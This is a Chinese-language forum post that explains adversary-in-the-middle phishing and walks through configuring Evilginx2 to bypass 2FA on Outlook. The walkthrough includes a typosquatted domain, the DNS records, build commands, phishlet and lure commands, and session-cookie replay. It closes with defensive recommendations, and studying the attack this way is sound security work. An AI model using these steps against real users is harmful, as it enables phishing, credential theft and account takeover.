DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 漏洞模板
查看: 4523|回复: 0

[技术前沿] 使用 Evilginx2 绕过 2FA 认证

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-12-15 11:04:32 | 显示全部楼层 |阅读模式

由于网络攻击 (尤其是 0day 攻击) 的数量不断增加,组织正争先恐后地获得可用的最佳安全服务。虽然即使是最小的组织也可能认为实施双因素身份验证 (2FA) 将确保其数据安全,但来自恶意攻击者的有针对性的攻击可能会引诱员工点击并打开恶意文档。

在这篇文章中,我们将详细介绍使用中间对手 (AITM) 网络钓鱼攻击方法进行此类攻击的步骤。

首先,让我们了解中间对手 (AITM,也称为中间人 (MITM)) 网络钓鱼攻击的工作原理。

此过程涉及发送专门为受害者制作的电子邮件,单击并打开后,恶意电子邮件会将受害者重定向到与受害者认为需要访问的应用程序相同的站点。攻击者使用的 Web 服务器然后用于代理所有发送到目标应用程序服务器和从目标应用程序服务器发送的 HTTP 数据包。

钓鱼页面充当 AITM 代理,使用两个 TLS 会话:一个会话连接到受害者,另一个会话连接到目标服务器。一旦受害者连接到服务器,攻击者就可以窃取密码和会话 cookie。会话 cookie 由目标网络服务器提供给用户,以表明它有一个经过身份验证的会话,并且不需要为它访问的每个页面重新进行身份验证。然后攻击者使用窃取的会话 cookie 重放经过身份验证的实例,从而获得对用户电子邮件帐户的访问权限并绕过任何身份验证过程,包括 2FA。



Microsoft 有一个 博客,其中包含有关如何在今年的商业电子邮件妥协 (BEC) 活动中使用此策略的更多详细信息。

出于研究目的,让我们看看如何执行此攻击。在为这种攻击建模时,我使用了 Evilgnx2,这是一种专为 AITM 攻击设计的框架。

攻击


首先,需要一点社会工程学,创建一个能够诱使目标认为他们位于正确网站上的域。对于这项研究,我使用了 miscrsoft.co,它的低成本使威胁行为者很容易购买。

需要一个外部主机到互联网,它将配置这里提供的攻击步骤:https://github.com/kgretzky/evilginx2

接下来,输入以下命令来下载和设置 evilginx2:

  1. sudo apt-get -y install git make
  2. git clone https://github.com/kgretzky/evilginx2.git
  3. cd evilginx2
  4. make
  5. run using evilginx -p ./phishlets/
复制代码

现在已经设置了 Evilginx2,准备域。由于在此示例中针对的是 Outlook,因此需要添加适当的 A 记录。

在域管理门户中设置了 Namesaver 记录和 A 记录。

Nameserver records:

Ns1.miscrsoft.co ->  external_server_ip
Ns2.miscrsoft.co ->  external_server_ip

A records:

account.miscrsoft.co -> external_server_ip
outlook.miscrsoft.co -> external_server_ip
login.miscrsoft.co -> external_server_ip

Namesaver 和 A 记录都可以根据受到攻击的应用程序进行更改。

接下来,为 Outlook 设置 Phishlet,因为这是我们研究的目标,在 Evilginx2 上运行以下命令:

  1. config domain miscrsoft.co
  2. config ip external_server_ip
  3. phishlets hostname outlook miscrsoft.co
  4. phishlets enable outlook
  5. lures create outlook
  6. lures get-url 0
复制代码

运行命令后,应设置所有 SSL 证书,为攻击者提供一个功能齐全的网络钓鱼 URL 以发送到受害者的电子邮件。

这是 URL 对受害者的显示方式:



此页面与合法网站相同,钓鱼页面有一个额外的安全连接,这样受害者就不会知道这是一个钓鱼页面。

输入密码后,受害者会收到 2FA 提示。



输入 2FA 凭据后,用户将被发送到其有效的 Outlook 收件箱。



攻击者现在已经以明文形式捕获了受害者的帐户、密码和会话令牌,所有这些都可以通过 Evilginx2 看到。





使用 Cookie 编辑器,我们可以复制会话并将其粘贴到浏览器中,无需进一步授权即可访问该帐户。

结论


2FA 是可以绕过的,但是,通过采取额外的电子邮件安全措施,可以最大限度地减少或防止此类攻击。组织必须实施严格的电子邮件安全措施以防范网络钓鱼攻击。限制对帐户、可信设备和 IP 的访问,以及监控流量和标记恶意行为,有助于防止网络钓鱼攻击得逞。此外,网络安全团队必须监控异常情况,例如来自不同 IP 或位置的登录,以协助防止妥协。

需要注意的是,这种攻击不适用于通用第二因素身份验证 (U2F) 实施,因为硬件密钥会验证登录 URL 并防止为恶意 URL 颁发 2FA 令牌。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-11-23 17:47 , Processed in 0.066087 second(s), 27 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表